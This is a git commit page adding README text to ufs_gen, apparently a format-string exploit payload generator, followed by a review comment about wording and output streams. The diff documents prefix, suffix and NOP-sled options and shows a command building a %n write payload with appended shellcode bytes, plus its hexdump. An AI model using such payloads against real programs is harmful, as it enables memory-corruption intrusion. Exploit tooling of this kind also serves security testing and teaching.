author | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 12:43:44 +0000 |
---|---|---|
committer | Olivier Gayot <duskcoder@gmail.com> | 2014-01-27 12:43:44 +0000 |
commit | 9aa9983fb7e737d2fa7d1c61b1f26411dbd04407 (patch) | |
tree | 68a57cd561cf3fe0e0d8faf417c2276e14836f32 /README | |
parent | a9f072448d2ffd9f1f275367533945e7a92237a3 (diff) |
update the usage message and the README
Refs: #1
Diffstat (limited to 'README')
-rw-r--r-- | README | 20 |
1 files changed, 20 insertions, 0 deletions
@@ -38,12 +38,32 @@ is not 4 bytes long, there is very few chances that it would work correctly. The support of printf(payload) directly (i.e. without a temporary buffer) is also planned. +We support the option --prefix and --suffix which respectively prepend and +append their argument to the payload. + +We also support the option --sfxnops which adds n NOP byte (0x90) between the +payload and the suffix + Example ======= user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n +user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')" +user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C +NOP bytes are at offset 52 (0x34) +suffix is at offset 152 (0x98) +00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".| +00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5| +00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x| +00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............| +00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| +* +00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D| +0000009f + + License ======= |
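Review bot: the new --sfxnops paragraph never says that n is the option's argument, reads "adds n NOP byte" where it should be "n NOP bytes", and is missing its final period. Something like "--sfxnops n inserts n NOP bytes (0x90) between the payload and the suffix." would fix all three. In the new example, the two lines "NOP bytes are at offset 52 (0x34)" and "suffix is at offset 152 (0x98)" appear outside the hexdump output even though the command is piped, so the README should state which stream they are written to and that they are not part of the generated payload. The paragraph also introduces --prefix, but the example only exercises --suffix. Either add a --prefix invocation or say whether the reported offsets account for a prefix.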